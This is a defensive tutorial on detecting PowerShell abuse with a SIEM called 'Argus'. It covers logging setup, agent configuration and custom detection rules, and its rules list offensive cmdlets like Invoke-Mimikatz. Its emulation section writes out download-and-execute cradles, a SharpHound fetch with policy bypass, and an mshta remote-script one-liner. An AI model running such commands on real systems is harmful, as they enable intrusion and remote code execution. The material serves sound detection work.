DETECTING POWERSHELL EXPLOITATION TECHNIQUES IN WINDOWS USING ARGUS

PowerShell is a powerful tool for managing Windows endpoints. It offers administrators the ability to control system functions, automate workflows, and streamline configuration management. Its scripting capabilities allow for the automation of complex tasks, saving time and minimizing human error.

However, these same features pose security risks, as threat actors can exploit PowerShell to execute malicious commands directly on endpoints. Attackers have used it to deploy malware, download malicious payloads, and steal sensitive data — often bypassing traditional antivirus detection. To mitigate these risks, it is crucial to monitor PowerShell activity and ensure only authorized commands are executed.

This use case explains how Argus can be used to detect and respond to these PowerShell abuse techniques on Windows endpoints.

REQUIREMENTS

  • Argus Manager or Argus Server
  • A Windows endpoint with the Argus agent installed

WINDOWS ENDPOINT

Steps to configure the Argus agent for log collection from PowerShell.

1. Run the following commands in PowerShell as an Administrator to enable detailed logging. By default, Windows does not log comprehensive information about executed PowerShell commands, to avoid increased resource usage and storage demands. Enabling logging provides greater visibility into PowerShell activity.

function Enable-PSLogging {
    # Define registry paths for ScriptBlockLogging and ModuleLogging
    $scriptBlockPath = 'HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $moduleLoggingPath = 'HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging'

    # Enable Script Block Logging (event ID 4104 in the PowerShell Operational channel)
    if (-not (Test-Path $scriptBlockPath)) {
        $null = New-Item $scriptBlockPath -Force
    }
    Set-ItemProperty -Path $scriptBlockPath -Name EnableScriptBlockLogging -Value 1

    # Enable Module Logging (event ID 4103)
    if (-not (Test-Path $moduleLoggingPath)) {
        $null = New-Item $moduleLoggingPath -Force
    }
    Set-ItemProperty -Path $moduleLoggingPath -Name EnableModuleLogging -Value 1

    # Specify modules to log - set to all (*) for comprehensive logging
    $moduleNames = @('*')  # To specify individual modules, replace * with module names in the array
    # Discard the property object New-ItemProperty returns so only the status line is printed
    $null = New-ItemProperty -Path $moduleLoggingPath -Name ModuleNames -PropertyType MultiString -Value $moduleNames -Force

    # The policy is read when a PowerShell engine starts, so sessions opened after this call are logged
    Write-Output "Script Block Logging and Module Logging have been enabled."
}

Enable-PSLogging

The expected output:

Script Block Logging and Module Logging have been enabled.
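Before wiring the agent up, it is worth confirming that the policy actually took effect and that events are landing in the channel the agent will read. The function below is an added verification helper, not part of the original article or of Argus; it reads back the registry values set by Enable-PSLogging, checks that the Microsoft-Windows-PowerShell/Operational channel is enabled, runs one harmless script block and counts the 4103/4104 events written in the last few minutes. Run it in a fresh elevated session opened after Enable-PSLogging, because the logging policy is read at engine start.

```powershell
# Added verification helper (not part of the original article or of Argus).
# Confirms the registry policy set by Enable-PSLogging and that the Operational
# channel the agent forwards is enabled and receiving 4103/4104 events.
function Test-PSLogging {
    [CmdletBinding()]
    param()

    $scriptBlockPath   = 'HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $moduleLoggingPath = 'HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging'
    $channelName       = 'Microsoft-Windows-PowerShell/Operational'

    $result = [ordered]@{
        ScriptBlockLoggingEnabled = $false
        ModuleLoggingEnabled      = $false
        ModuleNames               = @()
        OperationalChannelEnabled = $false
        ScriptBlockEvents4104     = 0
        ModuleEvents4103          = 0
    }

    # 1. Registry policy values written by Enable-PSLogging
    if (Test-Path $scriptBlockPath) {
        $sb = Get-ItemProperty -Path $scriptBlockPath -ErrorAction SilentlyContinue
        $result.ScriptBlockLoggingEnabled = ($sb.EnableScriptBlockLogging -eq 1)
    }
    if (Test-Path $moduleLoggingPath) {
        $ml = Get-ItemProperty -Path $moduleLoggingPath -ErrorAction SilentlyContinue
        $result.ModuleLoggingEnabled = ($ml.EnableModuleLogging -eq 1)
        $result.ModuleNames          = @($ml.ModuleNames)
    }

    # 2. The event channel named in the agent's <localfile> block must be enabled
    $channel = Get-WinEvent -ListLog $channelName -ErrorAction SilentlyContinue
    if ($channel) { $result.OperationalChannelEnabled = $channel.IsEnabled }

    # 3. Execute one harmless script block so that a 4104 record exists to find,
    #    then count recent 4103 (module) and 4104 (script block) events.
    & { Get-Date | Out-Null }
    Start-Sleep -Seconds 1
    $events = Get-WinEvent -FilterHashtable @{
        LogName   = $channelName
        Id        = 4103, 4104
        StartTime = (Get-Date).AddMinutes(-5)
    } -ErrorAction SilentlyContinue   # Get-WinEvent errors when nothing matches; treat that as zero
    $result.ScriptBlockEvents4104 = @($events | Where-Object Id -eq 4104).Count
    $result.ModuleEvents4103      = @($events | Where-Object Id -eq 4103).Count

    [pscustomobject]$result
}

Test-PSLogging
```

All three boolean fields should be True and ScriptBlockEvents4104 should be at least 1; if the registry values are True but the event counts stay at 0, the session was opened before the policy was applied, or the channel is disabled in Event Viewer and needs to be enabled there.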

2. Add the configuration below inside the <ossec_config> block of the C:\Program Files (x86)\ossec-agent\ossec.conf file to forward PowerShell logs to the Argus server:

<localfile>
  <location>Microsoft-Windows-PowerShell/Operational</location>
  <log_format>eventchannel</log_format>
</localfile>

3. Restart the Argus agent:

Restart-Service -Name wazuh

ARGUS SERVER

Steps on the Argus server to create custom rules to monitor the PowerShell events.

1. Add the custom rules to the /var/ossec/etc/rules/local_rules.xml rule file:

<group name="windows,powershell,">
  <rule id="100201" level="8">
    <if_sid>60009</if_sid>
    <field name="win.eventdata.payload" type="pcre2">(?i)CommandInvocation</field>
    <field name="win.system.message" type="pcre2">(?i)EncodedCommand|FromBase64String|EncodedArguments|-e\b|-enco\b|-en\b</field>
    <description>Encoded command executed via PowerShell.</description>
    <mitre>
      <id>T1059.001</id>
      <id>T1562.001</id>
    </mitre>
  </rule>

  <rule id="100202" level="4">
    <if_sid>60009</if_sid>
    <field name="win.system.message" type="pcre2">(?i)blocked by your antivirus software</field>
    <description>Windows Security blocked malicious command executed via PowerShell.</description>
    <mitre>
      <id>T1059.001</id>
    </mitre>
  </rule>

  <rule id="100203" level="10">
    <if_sid>60009</if_sid>
    <field name="win.eventdata.payload" type="pcre2">(?i)CommandInvocation</field>
    <field name="win.system.message" type="pcre2">(?i)Add-Persistence|Find-AVSignature|Get-GPPAutologon|Get-GPPPassword|Get-HttpStatus|Get-Keystrokes|Get-SecurityPackages|Get-TimedScreenshot|Get-VaultCredential|Get-VolumeShadowCopy|Install-SSP|Invoke-CredentialInjection|Invoke-DllInjection|Invoke-Mimikatz|Invoke-NinjaCopy|Invoke-Portscan|Invoke-ReflectivePEInjection|Invoke-ReverseDnsLookup|Invoke-Shellcode|Invoke-TokenManipulation|Invoke-WmiCommand|Mount-VolumeShadowCopy|New-ElevatedPersistenceOption|New-UserPersistenceOption|New-VolumeShadowCopy|Out-CompressedDll|Out-EncodedCommand|Out-EncryptedScript|Out-Minidump|PowerUp|PowerView|Remove-Comments|Remove-VolumeShadowCopy|Set-CriticalProcess|Set-MasterBootRecord</field>
    <description>Risky cmdlet executed. Possible malicious activity detected.</description>
    <mitre>
      <id>T1059.001</id>
    </mitre>
  </rule>

  <rule id="100204" level="8">
    <if_sid>91802</if_sid>
    <field name="win.eventdata.scriptBlockText" type="pcre2">(?i)mshta.*GetObject|mshta.*new ActiveXObject</field>
    <description>Mshta used to download a file. Possible malicious activity detected.</description>
    <mitre>
      <id>T1059.001</id>
    </mitre>
  </rule>

  <rule id="100205" level="5">
    <if_sid>60009</if_sid>
    <field name="win.eventdata.contextInfo" type="pcre2">(?i)ExecutionPolicy bypass|exec bypass</field>
    <description>PowerShell execution policy set to bypass.</description>
    <mitre>
      <id>T1059.001</id>
    </mitre>
  </rule>

  <rule id="100206" level="5">
    <if_sid>60009</if_sid>
    <field name="win.eventdata.contextInfo" type="pcre2">(?i)Invoke-WebRequest|IWR.*-url|IWR.*-InFile</field>
    <description>Invoke-WebRequest executed, possible download cradle detected.</description>
    <mitre>
      <id>T1059.001</id>
    </mitre>
  </rule>
</group>

2. Restart the Argus manager:

systemctl restart wazuh-manager

ATTACK EMULATION

Execution of malicious commands

Attackers exploit PowerShell to execute malicious commands on victim endpoints, enabling them to manipulate system processes and steal sensitive information. PowerShell is a favored tool for attackers as it can run commands directly in memory, bypassing file-based security defenses and reducing detection by traditional antivirus software.

We use PowerShell to execute SharpHound, the BloodHound data collector, which attackers use to enumerate an endpoint and its Active Directory environment.

Run the commands below to simulate the invocation of SharpHound:

>> curl "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/refs/heads/master/Collectors/SharpHound.ps1" -o SharpHound.ps1

>> powershell -ep bypass .\sharphound.ps1 -collectionmethod all

The alerts below are triggered on the Argus dashboard when the commands invoking SharpHound are executed.

Alert shown on the dashboard: rule.id 91809

DOWNLOADING AND EXECUTING FILES

A download cradle is a technique used to fetch and execute external scripts or payloads directly from the internet or other external sources. It is a common method for exploiting PowerShell, allowing attackers to retrieve and run malicious content in a single step, often evading traditional file-based security measures.

Run the command below to download and execute the EICAR malware test file.

>> powershell -Command "IEX(New-Object Net.WebClient).DownloadString('https://secure.eicar.org/eicar.com.txt -OutFile eicar;.\eicar')"

The below alert is triggered on the dashboard when the command is executed.

Another way a download cradle can be invoked is with the Invoke-WebRequest cmdlet. A malicious user can download and execute a malicious payload using this method.

Run the command below to simulate the activity:

>> Invoke-WebRequest https://secure.eicar.org/eicar.com.txt -OutFile eicar;.\eicar

The following alert is triggered on the Argus dashboard when the command is executed.

Rule ID 100206 detects a possible download cradle where Invoke-WebRequest is used to download a file.

LIVING OFF THE LAND

Living off the land (LOTL) techniques involve leveraging legitimate, built-in tools to execute malicious commands, reducing the need to download new malware and lowering the chance of detection. Attackers frequently exploit trusted Microsoft-signed binaries like mshta.exe, which is used to run Microsoft HTML Applications. By abusing mshta.exe, attackers can execute malicious JavaScript or VBScript directly from a URL or embedded script, enabling the download and execution of payloads. This method allows threat actors to mimic normal system activity, making it harder for security solutions to identify and block the threat.

Run the command below to simulate a LOTL attack. It tries to execute a JavaScript file directly from a URL:

>> mshta.exe "javascript:a=GetObject('script:#{url}').Exec();close()"

The below alert is triggered on the dashboard when the command is executed.

Rule ID 100204 detects when Mshta is used to download and execute a file.

CONCLUSION

PowerShell is a powerful tool that system administrators use to manage and automate tasks on Windows endpoints. However, attackers can misuse PowerShell to execute malicious commands, often bypassing detection by traditional security solutions. This document showcases how to use Argus to detect some PowerShell exploitation techniques.
